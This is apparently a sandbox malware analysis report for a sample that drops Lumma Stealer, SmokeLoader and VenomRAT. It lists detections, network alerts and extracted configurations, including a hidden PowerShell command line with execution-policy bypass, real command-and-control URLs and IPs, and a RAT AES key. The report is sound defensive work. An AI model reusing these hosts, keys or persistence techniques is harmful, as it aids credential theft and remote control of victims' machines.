Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\2FBE.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#0005_8yUscnjrUY

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1696, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentProcessId: 3288, ParentProcessName: BD9E.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1696, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentProcessId: 3288, ParentProcessName: BD9E.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1696, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 332, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentProcessId: 3288, ParentProcessName: BD9E.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1696, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\2FBE.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#0005_8yUscnjrUY

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jjistfr, CommandLine: C:\Users\user\AppData\Roaming\jjistfr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jjistfr, NewProcessName: C:\Users\user\AppData\Roaming\jjistfr, OriginalFileName: C:\Users\user\AppData\Roaming\jjistfr, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\jjistfr, ProcessId: 5672, ProcessName: jjistfr

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\BD9E.exe, ProcessId: 3288, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q205syu0.b5t.ps1

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1696, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 332, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BD9E.exe, ParentProcessId: 3288, ParentProcessName: BD9E.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 1696, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1696, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:34.929033+0200
SID:	2054602
Source Port:	50726
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:50.578668+0200
SID:	2039103
Source Port:	50744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 190.12.87.61

Timestamp:	2024-07-27T08:52:52.315081+0200
SID:	2039103
Source Port:	50804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:58.536310+0200
SID:	2039103
Source Port:	50687
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:38.344547+0200
SID:	2054602
Source Port:	50730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:18.995041+0200
SID:	2039103
Source Port:	50699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:32.142488+0200
SID:	2054653
Source Port:	50721
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution - Source IP: 104.26.2.16 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:31.311387+0200
SID:	2800584
Source Port:	443
Destination Port:	50720
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:07.533059+0200
SID:	2039103
Source Port:	50694
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:09.302452+0200
SID:	2011803
Source Port:	443
Destination Port:	50695
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:49.755743+0200
SID:	2048094
Source Port:	50743
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 31.14.70.245

Timestamp:	2024-07-27T08:54:38.078895+0200
SID:	2803274
Source Port:	50729
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T08:54:29.692823+0200
SID:	2054591
Source Port:	60712
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:49.444090+0200
SID:	2054604
Source Port:	50743
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:55:26.643000+0200
SID:	2054604
Source Port:	50782
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:59.770679+0200
SID:	2039103
Source Port:	50688
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:06.289309+0200
SID:	2039103
Source Port:	50693
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:43.905246+0200
SID:	2054604
Source Port:	50737
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:44.585235+0200
SID:	2054653
Source Port:	50737
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:05.052245+0200
SID:	2039103
Source Port:	50692
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:29.849654+0200
SID:	2039103
Source Port:	50679
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:33.401004+0200
SID:	2054602
Source Port:	50723
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:33.913163+0200
SID:	2048094
Source Port:	50723
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:26.228767+0200
SID:	2039103
Source Port:	50676
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:55:06.014573+0200
SID:	2054653
Source Port:	50759
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:39.949656+0200
SID:	2054602
Source Port:	50732
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:55.553885+0200
SID:	2054604
Source Port:	50749
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:43.379289+0200
SID:	2054653
Source Port:	50736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:48.072204+0200
SID:	2054604
Source Port:	50741
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:00.985640+0200
SID:	2039103
Source Port:	50689
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:55:02.426507+0200
SID:	2054604
Source Port:	50755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:02.228582+0200
SID:	2039103
Source Port:	50690
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:31.051539+0200
SID:	2039103
Source Port:	50680
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:24.157633+0200
SID:	2039103
Source Port:	50705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:20.239644+0200
SID:	2039103
Source Port:	50700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:53:54.297096+0200
SID:	2022930
Source Port:	443
Destination Port:	50685
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:28.638794+0200
SID:	2039103
Source Port:	50678
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:50.801787+0200
SID:	2054604
Source Port:	50746
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

GPL SHELLCODE x86 inc ebx NOOP - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:12.540705+0200
SID:	2101390
Source Port:	443
Destination Port:	50695
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:55:05.322481+0200
SID:	2054604
Source Port:	50759
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:27.443527+0200
SID:	2039103
Source Port:	50677
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:33.493254+0200
SID:	2039103
Source Port:	50682
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 64.190.113.113

Timestamp:	2024-07-27T08:54:02.842293+0200
SID:	2019714
Source Port:	50691
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:31.537129+0200
SID:	2054602
Source Port:	50721
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:55:06.908893+0200
SID:	2054604
Source Port:	50761
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:09.162429+0200
SID:	2011803
Source Port:	443
Destination Port:	50695
Protocol:	TCP
Classtype:	Executable code was detected

ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2 - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:09.021203+0200
SID:	2020757
Source Port:	443
Destination Port:	50695
Protocol:	TCP
Classtype:	Possibly Unwanted Program Detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:48.601619+0200
SID:	2048094
Source Port:	50741
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:41.528793+0200
SID:	2054602
Source Port:	50734
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:26.755088+0200
SID:	2039103
Source Port:	50710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:34.940778+0200
SID:	2039103
Source Port:	50683
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:57.333420+0200
SID:	2039103
Source Port:	50686
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:27.939167+0200
SID:	2039103
Source Port:	50713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T08:54:42.886858+0200
SID:	2054604
Source Port:	50736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T08:54:42.365744+0200
SID:	2054593
Source Port:	59197
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:36.320878+0200
SID:	2054602
Source Port:	50727
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:53:32.250796+0200
SID:	2039103
Source Port:	50681
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:30.720630+0200
SID:	2054653
Source Port:	50717
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:25.551880+0200
SID:	2039103
Source Port:	50708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:54:10.554742+0200
SID:	2011803
Source Port:	443
Destination Port:	50695
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 78.89.199.216

Timestamp:	2024-07-27T08:54:21.519425+0200
SID:	2039103
Source Port:	50702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:54:30.236223+0200
SID:	2054602
Source Port:	50717
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T08:53:16.134447+0200
SID:	2022930
Source Port:	443
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FpiUD4nYpj.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://callosallsaospz.shop/api3QFjF/HP	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiD	Avira URL Cloud: Label: malware
Source: callosallsaospz.shop	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop:443/api	Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\jjistfr

Avira: detection malicious, Label: HEUR/AGEN.1312596

Found malware configuration

Source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": 